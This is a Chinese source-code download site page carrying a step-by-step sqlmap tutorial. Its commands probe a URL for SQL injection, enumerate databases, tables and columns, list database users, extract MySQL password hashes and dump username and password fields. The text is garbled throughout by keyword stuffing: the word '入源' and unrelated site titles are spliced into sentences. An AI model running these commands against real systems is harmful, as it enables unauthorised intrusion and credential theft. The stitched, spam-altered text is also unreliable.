欢迎来到皮皮网官网

【微信点餐源码】【成都4p源码】【钻防红网源码】sal注入源码

时间:2024-12-26 02:25:36 来源:易语言批量挂q源码

1.salmap简单的入源使用步骤

sal注入源码

salmap简单的使用步骤

       大家或许和我有同样的感受,不想花费大量时间观看视频来学习这个工具。入源因此,入源微信点餐源码我整理了以下sqlmap的入源基本使用步骤,供大家参考。入源成都4p源码(如有不对之处,入源钻防红网源码欢迎在评论区指出)

       sqlmap的入源简单使用步骤:

       1. 清除sqlmap缓存:

       python sqlmap.py --purge

       2. 检测注入点是否可用:

       python sqlmap.py -u "URL"

       3. 暴库:

       python sqlmap.py -u "URL" -dbs

       4. 暴当前使用的数据库:

       python sqlmap.py -u "URL" –current-db

       5. 暴当前使用的账户:

       python sqlmap.py -u "URL" –current-user

       6. 列出所有使用过的账户:

       python sqlmap.py -u "URL" –users

       7. 查询mysql的登录账户和密码:

       python sqlmap.py -u "URL" –passwords

       8. 列出数据库中的表:

       python sqlmap.py -u "URL" -D "指定的数据库名" –tables

       9. 列出表中字段:

       python sqlmap.py -u "URL" -D "指定数据库名" -T "指定的表名" –columns

       . 爆字段内容:

       python sqlmap.py -u "URL" -D "指定数据库名" -T "指定的表名" -C "字段名" -dump

       此外,还有一些参数可供使用:

       1. 列数据库信息:--dbs

       2. web当前使用的入源数据库:--current-db

       3. web数据库使用账户:--current-user

       4. 列出sqlserver所有用户:--users

       5. 数据库账户与密码:--passwords

       6. 指定库名列出所有表:-D database --tables

       -D:指定数据库名称

       7. 指定库名表名列出所有字段:-D antian-T admin --columns

       -T:指定要列出字段的表

       8. 指定库名表名字段dump出指定字段:

       -D secbang_com -T admin -C id,password,username --dump

       -D antian -T userb -C"email,Username,userpassword" --dump

       可加双引号,也可不加双引号。入源

       9. 导出多少条数据:

       -D tourdata -T userb -C"email,入源Username,userpassword" --start 1 --stop --dump

       希望这些信息能对大家有所帮助!

入源

copyright © 2016 powered by 皮皮网   sitemap